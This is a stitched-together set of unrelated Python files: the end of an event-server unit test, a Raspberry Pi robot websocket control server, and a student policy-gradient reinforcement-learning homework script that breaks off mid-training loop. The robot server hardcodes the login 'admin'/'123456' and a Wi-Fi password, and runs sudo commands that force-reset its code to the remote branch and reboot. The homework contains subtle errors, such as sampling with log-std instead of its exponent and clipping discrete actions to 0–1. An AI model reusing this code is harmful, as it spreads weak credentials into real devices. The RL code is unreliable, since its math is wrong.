self.assertEqual('msg', pong_msg.msg)
class EventServerQueueCleanTest(Tests.EventServerClientTestBase):
client_class = event.BlockingEventClient
has_pong_client = False
def testQueueClean(self):
client = self.CreateClient()
for unused_i in range(1000):
client.post_event(event.Event(PING, msg='msg'))
client.post_event(event.Event(PONG, msg='msg'))
client.wait(lambda ev: ev.type == PONG)
# pylint: disable=protected-access
with self.server._lock:
for queue in self.server._queues:
self.assertFalse(queue.qsize())
if __name__ == '__main__':
unittest.main()
|
webServer.py
|
#!/usr/bin/env/python
# File name : server.py
# Production : GWR
# Website : www.adeept.com
# Author : William
# Date : 2020/03/17
import time
import threading
import move
import Adafruit_PCA9685
import os
import info
import RPIservo
import functions
import robotLight
import switch
import socket
#websocket
import asyncio
import websockets
import json
import app
from mpu6050 import mpu6050
OLED_connection = 1
try:
import OLED
screen = OLED.OLED_ctrl()
screen.start()
screen.screen_show(1, 'GEWBOT.COM')
except:
OLED_connection = 0
print('OLED disconnected')
pass
try:
sensor = mpu6050(0x68)
print('mpu6050 connected, PT MODE ON')
modeSelect = 'PT'
except:
print('mpu6050 disconnected, ARM MODE ON')
modeSelect = 'ARM'
functionMode = 0
speed_set = 100
rad = 0.5
turnWiggle = 60
scGear = RPIservo.ServoCtrl()
scGear.moveInit()
P_sc = RPIservo.ServoCtrl()
P_sc.start()
C_sc = RPIservo.ServoCtrl()
C_sc.start()
T_sc = RPIservo.ServoCtrl()
T_sc.start()
H_sc = RPIservo.ServoCtrl()
H_sc.start()
G_sc = RPIservo.ServoCtrl()
G_sc.start()
# modeSelect = 'none'
init_pwm = []
for i in range(16):
init_pwm.append(scGear.initPos[i])
fuc = functions.Functions()
fuc.start()
curpath = os.path.realpath(__file__)
thisPath = "/" + os.path.dirname(curpath)
def servoPosInit():
scGear.initConfig(0,init_pwm[0],1)
P_sc.initConfig(1,init_pwm[1],1)
T_sc.initConfig(2,init_pwm[2],1)
H_sc.initConfig(3,init_pwm[3],1)
G_sc.initConfig(4,init_pwm[4],1)
def replace_num(initial,new_num): #Call this function to replace data in '.txt' file
global r
newline=""
str_num=str(new_num)
with open(thisPath+"/RPIservo.py","r") as f:
for line in f.readlines():
if(line.find(initial) == 0):
line = initial+"%s" %(str_num+"\n")
newline += line
with open(thisPath+"/RPIservo.py","w") as f:
f.writelines(newline)
def FPV_thread():
global fpv
fpv=FPV.FPV()
fpv.capture_thread(addr[0])
def ap_thread():
os.system("sudo create_ap wlan0 eth0 Groovy 12345678")
def functionSelect(command_input, response):
global functionMode
if 'scan' == command_input:
if OLED_connection:
screen.screen_show(5,'SCANNING')
if modeSelect == 'PT':
radar_send = fuc.radarScan()
print(radar_send)
response['title'] = 'scanResult'
response['data'] = radar_send
time.sleep(0.3)
elif 'findColor' == command_input:
if OLED_connection:
screen.screen_show(5,'FindColor')
if modeSelect == 'PT':
flask_app.modeselect('findColor')
else:
screen.screen_show(6,'FC ONLY ON PT')
elif 'motionGet' == command_input:
if OLED_connection:
screen.screen_show(5,'MotionGet')
flask_app.modeselect('watchDog')
elif 'stopCV' == command_input:
flask_app.modeselect('none')
switch.switch(1,0)
switch.switch(2,0)
switch.switch(3,0)
elif 'police' == command_input:
if OLED_connection:
screen.screen_show(5,'POLICE')
RL.police()
elif 'policeOff' == command_input:
RL.pause()
move.motorStop()
elif 'automatic' == command_input:
if OLED_connection:
screen.screen_show(5,'Automatic')
if modeSelect == 'PT':
fuc.automatic()
else:
fuc.pause()
elif 'automaticOff' == command_input:
fuc.pause()
move.motorStop()
elif 'trackLine' == command_input:
fuc.trackLine()
if OLED_connection:
screen.screen_show(5,'TrackLine')
elif 'trackLineOff' == command_input:
fuc.pause()
elif 'steadyCamera' == command_input:
if OLED_connection:
screen.screen_show(5,'SteadyCamera')
if modeSelect == 'PT':
fuc.steady(T_sc.lastPos[2])
elif 'steadyCameraOff' == command_input:
fuc.pause()
move.motorStop()
def switchCtrl(command_input, response):
if 'Switch_1_on' in command_input:
switch.switch(1,1)
elif 'Switch_1_off' in command_input:
switch.switch(1,0)
elif 'Switch_2_on' in command_input:
switch.switch(2,1)
elif 'Switch_2_off' in command_input:
switch.switch(2,0)
elif 'Switch_3_on' in command_input:
switch.switch(3,1)
elif 'Switch_3_off' in command_input:
switch.switch(3,0)
def robotCtrl(command_input, response):
global direction_command, turn_command
if 'forward' == command_input:
direction_command = 'forward'
move.move(speed_set, 'forward', 'no', rad)
elif 'backward' == command_input:
direction_command = 'backward'
move.move(speed_set, 'backward', 'no', rad)
elif 'DS' in command_input:
direction_command = 'no'
move.move(speed_set, 'no', 'no', rad)
elif 'left' == command_input:
turn_command = 'left'
move.move(speed_set, 'no', 'left', rad)
elif 'right' == command_input:
turn_command = 'right'
move.move(speed_set, 'no', 'right', rad)
elif 'TS' in command_input:
turn_command = 'no'
if direction_command == 'no':
move.move(speed_set, 'no', 'no', rad)
else:
move.move(speed_set, direction_command, 'no', rad)
elif 'lookleft' == command_input:
P_sc.singleServo(0, 1, 4)
elif 'lookright' == command_input:
P_sc.singleServo(0, -1, 4)
elif 'LRstop' in command_input:
P_sc.stopWiggle()
elif 'up' == command_input:
if modeSelect == 'PT':
C_sc.singleServo(1, -1, 6)
else:
T_sc.singleServo(2, -1, 3)
elif 'down' == command_input:
if modeSelect == 'PT':
C_sc.singleServo(1, 1, 6)
else:
T_sc.singleServo(2, 1, 3)
elif 'armup' == command_input:
# T_sc.singleServo(4, -1, 3)
C_sc.singleServo(1, -1, 6)
elif 'armdown' == command_input:
# T_sc.singleServo(4, 1, 3)
C_sc.singleServo(1, 1, 6)
elif 'armstop' in command_input:
# T_sc.stopWiggle()
C_sc.stopWiggle()
elif 'UDstop' in command_input:
C_sc.stopWiggle()
T_sc.stopWiggle()
elif 'handup' == command_input:
# H_sc.singleServo(2, 1, 3)
C_sc.singleServo(1, -1, 6)
elif 'handdown' == command_input:
# H_sc.singleServo(2, -1, 3)
C_sc.singleServo(1, 1, 6)
elif 'HAstop' in command_input:
# H_sc.stopWiggle()
C_sc.stopWiggle()
elif 'grab' == command_input:
G_sc.singleServo(3, -1, 3)
elif 'loose' == command_input:
G_sc.singleServo(3, 1, 3)
elif 'stop' == command_input:
G_sc.stopWiggle()
elif 'home' == command_input:
P_sc.moveServoInit([0])
C_sc.moveServoInit([4])
T_sc.moveServoInit([1])
H_sc.moveServoInit([2])
G_sc.moveServoInit([3])
def configPWM(command_input, response):
if 'SiLeft' in command_input:
numServo = int(command_input[7:])
init_pwm[numServo] = init_pwm[numServo] - 1
scGear.initConfig(numServo, init_pwm[numServo], 1)
if 'SiRight' in command_input:
numServo = int(command_input[7:])
init_pwm[numServo] = init_pwm[numServo] + 1
scGear.initConfig(numServo, init_pwm[numServo], 1)
if 'PWMMS' in command_input:
numServo = int(command_input[6:])
replace_num("init_pwm%d = "%numServo, init_pwm[numServo])
if 'PWMINIT' == command_input:
for i in range(0,16):
scGear.initConfig(i, init_pwm[i], 1)
if 'PWMD' == command_input:
for i in range(0,16):
init_pwm[i] = 300
replace_num("init_pwm%d = "%numServo, init_pwm[numServo])
def update_code():
# Update local to be consistent with remote
projectPath = thisPath[:-7]
with open(f'{projectPath}/config.json', 'r') as f1:
config = json.load(f1)
if not config['production']:
print('Update code')
# Force overwriting local code
if os.system(f'cd {projectPath} && sudo git fetch --all && sudo git reset --hard origin/master && sudo git pull') == 0:
print('Update successfully')
print('Restarting...')
os.system('sudo reboot')
def wifi_check():
try:
s =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("1.1.1.1",80))
ipaddr_check=s.getsockname()[0]
s.close()
print(ipaddr_check)
update_code()
if OLED_connection:
screen.screen_show(2, 'IP:'+ipaddr_check)
screen.screen_show(3, 'AP MODE OFF')
except:
ap_threading=threading.Thread(target=ap_thread) #Define a thread for data receiving
ap_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
ap_threading.start() #Thread starts
if OLED_connection:
screen.screen_show(2, 'AP Starting 10%')
RL.setColor(0,16,50)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 30%')
RL.setColor(0,16,100)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 50%')
RL.setColor(0,16,150)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 70%')
RL.setColor(0,16,200)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 90%')
RL.setColor(0,16,255)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 100%')
RL.setColor(35,255,35)
if OLED_connection:
screen.screen_show(2, 'IP:192.168.12.1')
screen.screen_show(3, 'AP MODE ON')
async def check_permit(websocket):
while True:
recv_str = await websocket.recv()
cred_dict = recv_str.split(":")
if cred_dict[0] == "admin" and cred_dict[1] == "123456":
response_str = "congratulation, you have connect with server\r\nnow, you can do something else"
await websocket.send(response_str)
return True
else:
response_str = "sorry, the username or password is wrong, please submit again"
await websocket.send(response_str)
async def recv_msg(websocket):
global speed_set, modeSelect
move.setup()
direction_command = 'no'
turn_command = 'no'
while True:
response = {
'status' : 'ok',
'title' : '',
'data' : None
}
data = ''
data = await websocket.recv()
try:
data = json.loads(data)
except Exception as e:
print('not A JSON')
if not data:
continue
if isinstance(data,str):
robotCtrl(data, response)
switchCtrl(data, response)
functionSelect(data, response)
configPWM(data, response)
if 'get_info' == data:
response['title'] = 'get_info'
response['data'] = [info.get_cpu_tempfunc(), info.get_cpu_use(), info.get_ram_info()]
if 'wsB' in data:
try:
set_B=data.split()
speed_set = int(set_B[1])
except:
pass
elif 'AR' == data:
modeSelect = 'AR'
screen.screen_show(4, 'ARM MODE ON')
try:
fpv.changeMode('ARM MODE ON')
except:
pass
elif 'PT' == data:
modeSelect = 'PT'
screen.screen_show(4, 'PT MODE ON')
try:
fpv.changeMode('PT MODE ON')
except:
pass
#CVFL
elif 'CVFL' == data:
flask_app.modeselect('findlineCV')
elif 'CVFLColorSet' in data:
color = int(data.split()[1])
flask_app.camera.colorSet(color)
elif 'CVFLL1' in data:
pos = int(data.split()[1])
flask_app.camera.linePosSet_1(pos)
elif 'CVFLL2' in data:
pos = int(data.split()[1])
flask_app.camera.linePosSet_2(pos)
elif 'CVFLSP' in data:
err = int(data.split()[1])
flask_app.camera.errorSet(err)
elif 'defEC' in data:#Z
fpv.defaultExpCom()
elif(isinstance(data,dict)):
if data['title'] == "findColorSet":
color = data['data']
flask_app.colorFindSet(color[0],color[1],color[2])
if not functionMode:
if OLED_connection:
screen.screen_show(5,'Functions OFF')
else:
pass
print(data)
response = json.dumps(response)
await websocket.send(response)
async def main_logic(websocket, path):
await check_permit(websocket)
await recv_msg(websocket)
if __name__ == '__main__':
switch.switchSetup()
switch.set_all_switch_off()
HOST = ''
PORT = 10223 #Define port serial
BUFSIZ = 1024 #Define buffer size
ADDR = (HOST, PORT)
global flask_app
flask_app = app.webapp()
flask_app.startthread()
try:
RL=robotLight.RobotLight()
RL.start()
RL.breath(70,70,255)
except:
print('Use "sudo pip3 install rpi_ws281x" to install WS_281x package\n使用"sudo pip3 install rpi_ws281x"命令来安装rpi_ws281x')
pass
while 1:
wifi_check()
try: #Start server,waiting for client
start_server = websockets.serve(main_logic, '0.0.0.0', 8888)
asyncio.get_event_loop().run_until_complete(start_server)
print('waiting for connection...')
# print('...connected from :', addr)
break
except Exception as e:
print(e)
RL.setColor(0,0,0)
try:
RL.setColor(0,80,255)
except:
pass
try:
asyncio.get_event_loop().run_forever()
except Exception as e:
print(e)
RL.setColor(0,0,0)
move.destroy()
|
train_pg_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
import tensorflow as tf
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
with tf.variable_scope(scope):
input_holder = input_placeholder
for h in range(n_layers):
next_layer = tf.layers.dense(input_holder, size, activation=activation, use_bias=True)
input_holder = next_layer
output_layer = tf.layers.dense(input_holder, output_size, activation=output_activation, use_bias=True)
return output_layer
def build_rnn(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
with tf.variable_scope(scope):
input_holder = input_placeholder
for h in range(n_layers):
next_layer = tf.layers.dense(input_holder, size, activation=activation, use_bias=True)
input_holder = next_layer
output_layer = tf.layers.dense(input_holder, output_size, activation=output_activation, use_bias=True)
return output_layer
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in policy gradient
loss function.
See Agent.build_computation_graph for notation
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
#raise NotImplementedError
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR CODE HERE
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
# YOUR_CODE_HERE
output = build_mlp(sy_ob_no, self.ac_dim, "", n_layers=self.n_layers, size=self.size)
sy_logits_na = output
return sy_logits_na
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, self.ac_dim, "", n_layers=self.n_layers, size=self.size)
sy_logstd = tf.get_variable("log_std", shape=(self.ac_dim,), dtype=tf.float32)
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
sy_sampled_ac = tf.multinomial(sy_logits_na, 1)
sy_sampled_ac = tf.clip_by_value(sy_sampled_ac, 0, 1)
else:
sy_mean, sy_logstd = policy_parameters
z = tf.random_normal(tf.shape(sy_mean))
# YOUR_CODE_HERE
sy_sampled_ac = sy_mean + sy_logstd * z
return sy_sampled_ac
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
dist = tf.distributions.Categorical(sy_logits_na)
sy_logprob_n = dist.log_prob(sy_ac_na)
else:
sy_mean, sy_logstd = policy_parameters
dist = tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean,
scale_identity_multiplier=tf.exp(sy_logstd))
#dist = tf.distributions.Normal(loc=sy_mean, scale=tf.exp(sy_logstd))
# YOUR_CODE_HERE
sy_logprob_n = dist.log_prob(sy_ac_na)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
#========================================================================================#
# ----------PROBLEM 2----------
# Loss Function and Training Operation
#========================================================================================#
self.loss = -tf.reduce_mean(self.sy_logprob_n*self.sy_adv_n)
self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)
#========================================================================================#
# ----------PROBLEM 6----------
# Optional Baseline
#
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
#========================================================================================#
if self.nn_baseline:
self.baseline_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_baseline",
n_layers=self.n_layers,
size=self.size))
# YOUR_CODE_HERE
self.sy_target_n = self.sy_adv_n
baseline_loss = tf.reduce_mean(tf.squared_difference(self.baseline_prediction, self.sy_target_n))
self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: [ob]})
ac = ac[0][0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
# YOUR_CODE_HERE
if self.reward_to_go:
sums = [
[np.sum(
np.array([(self.gamma ** idx) * reward for idx, reward in enumerate(path[startind - 1:])])[::-1]
)
for startind in range(len(path), 0, -1)][::-1]
for path in re_n]
q_n = np.concatenate(sums)
else:
sums = [np.repeat(
np.sum([(self.gamma ** idx) * reward for idx, reward in enumerate(path)]),
len(path))
for path in re_n]
q_n = np.concatenate(sums)
return q_n
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.
b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no:ob_no}) # YOUR CODE HERE
b_n = b_n - np.mean(b_n)
std = np.std(b_n)
if std != 0:
b_n /= std
stdq = np.std(q_n)
if stdq != 0:
b_n *= stdq
b_n += np.mean(q_n)
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
return adv_n
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_n -= np.mean(adv_n)
std = np.std(adv_n)
if std != 0:
adv_n /= std
return q_n, adv_n
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
# YOUR_CODE_HERE
target_n = q_n - np.mean(q_n)
std = np.std(target_n)
if std != 0:
target_n /= std
self.sess.run(self.baseline_update_op, feed_dict={self.sy_ob_no: ob_no, self.sy_adv_n:target_n})
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
#ob_no, ac_na, q_n, adv_n
# pre_loss = self.sess.run(self.loss, feed_dict=dic)
# print(pre_loss)
ac_na_reshaped = np.reshape(ac_na, [ac_na.shape[0], self.ac_dim])
if self.discrete:
dic={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n}
self.sess.run(self.update_op, feed_dict=dic)
else:
dic={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na_reshaped, self.sy_adv_n: adv_n}
self.sess.run(self.update_op, feed_dict=dic)
#post_loss = self.sess.run(self.loss, feed_dict=dic)
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
